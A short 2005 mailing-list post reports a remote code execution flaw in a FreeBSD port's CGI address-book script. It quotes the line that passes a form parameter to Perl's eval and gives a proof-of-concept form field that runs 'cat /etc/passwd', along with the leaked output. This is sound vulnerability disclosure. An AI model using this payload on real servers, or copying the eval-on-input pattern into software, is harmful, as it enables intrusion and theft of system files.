FreeBSD Port: p5-ldap-abook-1.00
Roman Mashirov
mrj at mrj.spb.ru
Fri Nov 18 01:49:59 PST 2005
Hi!
This cgi script contains remote code exec. In the following code (line 128):
my $attr = eval $query->param(entry);
script directly evaluates cgi paramter, received form client, so <input
type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
following output from script:
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
# root:*:0:0:Charlie &:/root:/bin/csh
and so on
WBR
--
MRJ
More information about the freebsd-ports
mailing list